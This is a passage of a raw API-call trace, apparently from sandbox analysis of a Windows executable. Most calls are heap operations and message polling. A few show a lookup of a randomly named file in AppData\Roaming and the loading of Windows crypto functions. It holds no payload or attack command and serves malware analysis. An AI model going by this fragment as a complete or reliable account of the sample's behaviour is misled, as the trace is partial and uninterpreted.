wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f850 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0232.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0232.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f850 | out: hHeap=0x970000) returned 1 [0232.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.658] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0232.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0232.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.659] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/IYqWm9FjXEquwVFEM.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365f2f00, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0xb903a490, ftLastAccessTime.dwHighDateTime=0x1d5f019, ftLastWriteTime.dwLowDateTime=0xb903a490, ftLastWriteTime.dwHighDateTime=0x1d5f019, nFileSizeHigh=0x0, nFileSizeLow=0xcb91, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="IYqWm9FjXEquwVFEM.wav", cAlternateFileName="IYQWM9~1.WAV")) returned 0xa87510 [0232.659] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0232.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0232.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0232.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0232.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f940 | out: hHeap=0x970000) returned 1 [0232.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0232.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0232.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.660] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0232.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fad0 | out: hHeap=0x970000) returned 1 [0232.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0232.660] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0232.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0232.661] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0232.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.661] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0232.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0232.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0232.661] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0232.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0232.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0232.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f850 [0232.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0232.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0232.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0232.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0232.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0232.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0232.662] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0232.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f940 | out: hHeap=0x970000) returned 1 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.663] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.663] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0232.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0232.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0232.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0232.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0232.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0232.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0232.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.664] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.664] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f940 | out: hHeap=0x970000) returned 1 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0232.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.665] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0232.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0232.665] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0232.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0232.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0232.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0232.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0232.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0232.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.667] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0232.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0232.667] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0232.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0232.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0232.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0232.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0232.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0232.705] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0232.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0232.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0232.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0232.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0232.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0232.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0232.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699e8 [0232.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0232.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0232.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0232.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0232.706] GetProcAddress 